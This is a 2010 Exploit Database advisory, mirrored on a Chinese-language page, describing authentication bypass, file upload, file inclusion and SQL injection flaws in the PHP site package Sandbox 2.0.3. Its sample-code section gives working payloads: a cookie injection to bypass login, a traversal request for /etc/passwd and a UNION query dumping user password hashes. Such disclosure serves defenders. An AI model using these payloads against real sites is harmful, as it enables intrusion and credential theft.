sandbox 2.0.3 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： Salvatore Fresta
  日期： 2010-07-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14255/

• Sandbox 2.0.3 Multiple Remote Vulnerabilities
  
   NameSandbox
   Vendorhttp://www.iguanadons.net
   Versions Affected 2.0.3
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-07-07
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  ________________________
  
  Sandbox is a personal website package that providesyou
  with a blog, image gallery, file downloads area, and the
  abilityto create miscellaneous customwebpages. 
  
  
  II. DESCRIPTION
  _______________
  
  Some parameters are not sanitisedbeforebeingused in
  SQL queries and in danger PHP's functions.
  The vulnerabilities are reported in version 2.0.3.Other
  versions may also be affected.
  
  
  III. ANALYSIS
  _____________
  
  Summary:
  
   A) Authentication Bypass
   B) Arbitrary File Upload
   C) Local File Inclusion
   D) SQL Injection
   
  
  A) Authentication Bypass
  ________________________
  
  Thesandbox_pass'scookievalueinglobal.php is not
  properlysanitisedbeforebeingusedin a SQL query.
  Sincethisvalue is used fortheauthentication
  system, the injection can be used to bypass it.
  Successful exploitationrequires that "magic_quotes_gpc"
  is disabled.
  
  
  B) Arbitrary File Upload
  ________________________
  
  When a file is sent to blog.php (and also to profile.php)
  a bad check for extension is did. Thecheckconsists in
  dividingthefile's nameinsubstrings delimited by a
  pointandcheckingifthe second substring's value is
  present in the white list. Thismethodworks fine for a
  file with a single extension,butif an attacker uses a
  file withadoubleextension, this method doesn't work
  well. The following is the affected code in blog.php:
  
  $fname = $this->files['image_file']['tmp_name'];
  $system = explode( '.', $this->files['image_file']['name'] );
  $system[1] = strtolower($system[1]);
  
  if ( !preg_match( '/jpg|jpeg|png|gif/', $system[1] ) ) {
  NO UPLOAD
  } else {
  UPLOAD
  }
  
  If the file's name is evil.jpg.php: $system[1] = jpg
  
  
  C) Local File Inclusion 
  _______________________
  
  Theaparameterin admin.php is not properly sanitised
  beforebeingusedintherequire()PHP'sfunction.
  Thiscanbeexploitedto include arbitrary files from
  localresourcesviadirectorytraversalattacksand
  URL-encoded NULL bytes.
  
  
  D) SQL Injection 
  ________________
  
  Thepparameterin modules/page.phpisnotproperly
  sanitised before being used in a SQL query. Thiscanbe
  exploitedtomanipulate SQLqueries by injecting
  arbitrary SQL code.
  
  
  IV. SAMPLE CODE
  _______________
  
  A) Authentication Bypass
  
  cookie: sandbox_pass = 1' OR '1'='1'#
  cookie: sandbox_user = userid (1 for admin)
  
  
  B) Arbitrary File Upload
  
  Upload a file with a double extension.
  
  
  C) Local File Inclusion
  
  http://site/path/admin.php?a=../../../../../../../etc/passwd%00
  
  
  D) SQL Injection
  
  http://site/path/index.php?a=page&p=-1 UNION SELECT 1,2,3,4,5,6,7,CONCAT(user_name,0x3a,user_password) FROM sb_users
  
  
  V. FIX
  ______
  
  No fix.